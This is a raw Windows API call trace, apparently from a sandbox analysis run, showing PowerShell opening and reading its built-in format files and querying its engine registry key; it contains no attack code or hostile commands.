	[0346.219] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad540 | out: lpFileInformation=0xad540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0346.219] SetErrorMode (uMode=0x1) returned 0x1
	[0346.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0346.219] SetErrorMode (uMode=0x1) returned 0x1
	[0346.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad540 | out: lpFileInformation=0xad540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0346.220] SetErrorMode (uMode=0x1) returned 0x1
	[0346.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0346.220] SetErrorMode (uMode=0x1) returned 0x1
	[0346.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad540 | out: lpFileInformation=0xad540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0346.220] SetErrorMode (uMode=0x1) returned 0x1
	[0346.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0346.220] SetErrorMode (uMode=0x1) returned 0x1
	[0346.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad540 | out: lpFileInformation=0xad540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0346.220] SetErrorMode (uMode=0x1) returned 0x1
	[0346.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0346.221] SetErrorMode (uMode=0x1) returned 0x1
	[0346.221] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad540 | out: lpFileInformation=0xad540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0346.221] SetErrorMode (uMode=0x1) returned 0x1
	[0346.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0346.221] SetErrorMode (uMode=0x1) returned 0x1
	[0346.221] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad540 | out: lpFileInformation=0xad540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0346.221] SetErrorMode (uMode=0x1) returned 0x1
	[0346.222] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0346.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.222] CoTaskMemFree (pv=0x1b8da0) 
	[0346.224] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0346.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.224] CoTaskMemFree (pv=0x1b8da0) 
	[0346.224] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0346.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.224] CoTaskMemFree (pv=0x1b8da0) 
	[0346.224] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0346.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.224] CoTaskMemFree (pv=0x1b8da0) 
	[0346.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xacc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.225] SetErrorMode (uMode=0x1) returned 0x1
	[0346.225] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0346.225] GetFileType (hFile=0x2fc) returned 0x1
	[0346.225] SetErrorMode (uMode=0x1) returned 0x1
	[0346.225] GetFileType (hFile=0x2fc) returned 0x1
	[0346.225] ReadFile (in: hFile=0x2fc, lpBuffer=0x34320d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34320d8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.227] ReadFile (in: hFile=0x2fc, lpBuffer=0x34320d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34320d8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.227] ReadFile (in: hFile=0x2fc, lpBuffer=0x34320d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34320d8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.227] ReadFile (in: hFile=0x2fc, lpBuffer=0x34320d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34320d8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.228] ReadFile (in: hFile=0x2fc, lpBuffer=0x34320d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34320d8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.228] ReadFile (in: hFile=0x2fc, lpBuffer=0x34320d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34320d8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.228] ReadFile (in: hFile=0x2fc, lpBuffer=0x34320d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34320d8*, lpNumberOfBytesRead=0xad1d8*=0x9e2, lpOverlapped=0x0) returned 1
	[0346.228] ReadFile (in: hFile=0x2fc, lpBuffer=0x3431622, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x3431622*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0346.228] ReadFile (in: hFile=0x2fc, lpBuffer=0x34320d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34320d8*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0346.228] CloseHandle (hObject=0x2fc) returned 1
	[0346.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xacf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.229] SetErrorMode (uMode=0x1) returned 0x1
	[0346.229] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad180 | out: lpFileInformation=0xad180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0346.229] SetErrorMode (uMode=0x1) returned 0x1
	[0346.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.229] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad268 | out: phkResult=0xad268*=0x2fc) returned 0x0
	[0346.229] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1ec, lpData=0x0, lpcbData=0xad1e8*=0x0 | out: lpType=0xad1ec*=0x1, lpData=0x0, lpcbData=0xad1e8*=0x56) returned 0x0
	[0346.229] CoTaskMemAlloc (cb=0x5a) returned 0x2554f0
	[0346.229] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1bc, lpData=0x2554f0, lpcbData=0xad1b8*=0x56 | out: lpType=0xad1bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad1b8*=0x56) returned 0x0
	[0346.229] CoTaskMemFree (pv=0x2554f0) 
	[0346.230] RegCloseKey (hKey=0x2fc) returned 0x0
	[0346.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.233] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x69901386, Data2=0xb5b, Data3=0x42df, Data4=([0]=0x80, [1]=0x5, [2]=0x0, [3]=0x9a, [4]=0xc, [5]=0x1, [6]=0xac, [7]=0xd9))) returned 0x0
	[0346.237] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xb4a55afb, Data2=0x61d2, Data3=0x4180, Data4=([0]=0xa4, [1]=0x7a, [2]=0xa3, [3]=0x3, [4]=0x9f, [5]=0xdb, [6]=0xa4, [7]=0xae))) returned 0x0
	[0346.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0346.238] SetErrorMode (uMode=0x1) returned 0x1
	[0346.238] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0346.238] GetFileType (hFile=0x2fc) returned 0x1
	[0346.238] SetErrorMode (uMode=0x1) returned 0x1
	[0346.238] GetFileType (hFile=0x2fc) returned 0x1
	[0346.239] ReadFile (in: hFile=0x2fc, lpBuffer=0x345cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x345cc40*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.240] ReadFile (in: hFile=0x2fc, lpBuffer=0x345cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x345cc40*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.240] ReadFile (in: hFile=0x2fc, lpBuffer=0x345cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x345cc40*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.240] ReadFile (in: hFile=0x2fc, lpBuffer=0x345cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x345cc40*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.240] ReadFile (in: hFile=0x2fc, lpBuffer=0x345cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x345cc40*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.241] ReadFile (in: hFile=0x2fc, lpBuffer=0x345cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x345cc40*, lpNumberOfBytesRead=0xad1d8*=0xfb2, lpOverlapped=0x0) returned 1
	[0346.241] ReadFile (in: hFile=0x2fc, lpBuffer=0x345c35a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x345c35a*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0346.241] ReadFile (in: hFile=0x2fc, lpBuffer=0x345cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x345cc40*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0346.242] CloseHandle (hObject=0x2fc) returned 1
	[0346.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0346.242] SetErrorMode (uMode=0x1) returned 0x1
	[0346.242] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad180 | out: lpFileInformation=0xad180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0346.242] SetErrorMode (uMode=0x1) returned 0x1
	[0346.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0346.242] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad268 | out: phkResult=0xad268*=0x2fc) returned 0x0
	[0346.242] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1ec, lpData=0x0, lpcbData=0xad1e8*=0x0 | out: lpType=0xad1ec*=0x1, lpData=0x0, lpcbData=0xad1e8*=0x56) returned 0x0
	[0346.242] CoTaskMemAlloc (cb=0x5a) returned 0x254ca0
	[0346.242] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1bc, lpData=0x254ca0, lpcbData=0xad1b8*=0x56 | out: lpType=0xad1bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad1b8*=0x56) returned 0x0
	[0346.243] CoTaskMemFree (pv=0x254ca0) 
	[0346.243] RegCloseKey (hKey=0x2fc) returned 0x0
	[0346.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0346.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0346.244] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xfeea9f0f, Data2=0x5dd8, Data3=0x41ff, Data4=([0]=0x8c, [1]=0xa2, [2]=0xf6, [3]=0x52, [4]=0x1c, [5]=0x85, [6]=0xef, [7]=0x2d))) returned 0x0
	[0346.485] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xfd12aa01, Data2=0xd48a, Data3=0x42c3, Data4=([0]=0x89, [1]=0x79, [2]=0x75, [3]=0xd6, [4]=0xe4, [5]=0x17, [6]=0x2f, [7]=0x63))) returned 0x0
	[0346.486] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x397c601c, Data2=0xd5a9, Data3=0x443b, Data4=([0]=0xbb, [1]=0x4f, [2]=0x84, [3]=0xb, [4]=0x4f, [5]=0xf3, [6]=0x99, [7]=0xdc))) returned 0x0
	[0346.486] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x8e5de802, Data2=0x9ea2, Data3=0x4869, Data4=([0]=0xba, [1]=0x42, [2]=0x53, [3]=0xd0, [4]=0xed, [5]=0x2b, [6]=0xba, [7]=0xf5))) returned 0x0
	[0346.486] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x9a5d7741, Data2=0x7357, Data3=0x44d3, Data4=([0]=0xbf, [1]=0xa7, [2]=0xb3, [3]=0x11, [4]=0x4, [5]=0x42, [6]=0x47, [7]=0xb0))) returned 0x0
	[0346.486] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x68ae88c7, Data2=0x8a90, Data3=0x40f6, Data4=([0]=0xb9, [1]=0x8c, [2]=0x13, [3]=0xd5, [4]=0xd9, [5]=0x55, [6]=0x69, [7]=0x1e))) returned 0x0
	[0346.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.487] SetErrorMode (uMode=0x1) returned 0x1
	[0346.487] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0346.487] GetFileType (hFile=0x2fc) returned 0x1
	[0346.487] SetErrorMode (uMode=0x1) returned 0x1
	[0346.487] GetFileType (hFile=0x2fc) returned 0x1
	[0346.487] ReadFile (in: hFile=0x2fc, lpBuffer=0x34a89a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34a89a0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.488] ReadFile (in: hFile=0x2fc, lpBuffer=0x34a89a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34a89a0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.489] ReadFile (in: hFile=0x2fc, lpBuffer=0x34a89a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34a89a0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.489] ReadFile (in: hFile=0x2fc, lpBuffer=0x34a89a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34a89a0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.490] ReadFile (in: hFile=0x2fc, lpBuffer=0x34a89a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34a89a0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.490] ReadFile (in: hFile=0x2fc, lpBuffer=0x34a89a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34a89a0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0346.490] ReadFile (in: hFile=0x2fc, lpBuffer=0x34a89a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34a89a0*, lpNumberOfBytesRead=0xad1d8*=0xaca, lpOverlapped=0x0) returned 1
	[0346.490] ReadFile (in: hFile=0x2fc, lpBuffer=0x34a7fd2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34a7fd2*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0346.490] ReadFile (in: hFile=0x2fc, lpBuffer=0x34a89a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x34a89a0*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0346.490] CloseHandle (hObject=0x2fc) returned 1
	[0346.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.491] SetErrorMode (uMode=0x1) returned 0x1
	[0346.491] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad180 | out: lpFileInformation=0xad180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0346.491] SetErrorMode (uMode=0x1) returned 0x1
	[0346.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.491] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad268 | out: phkResult=0xad268*=0x2fc) returned 0x0
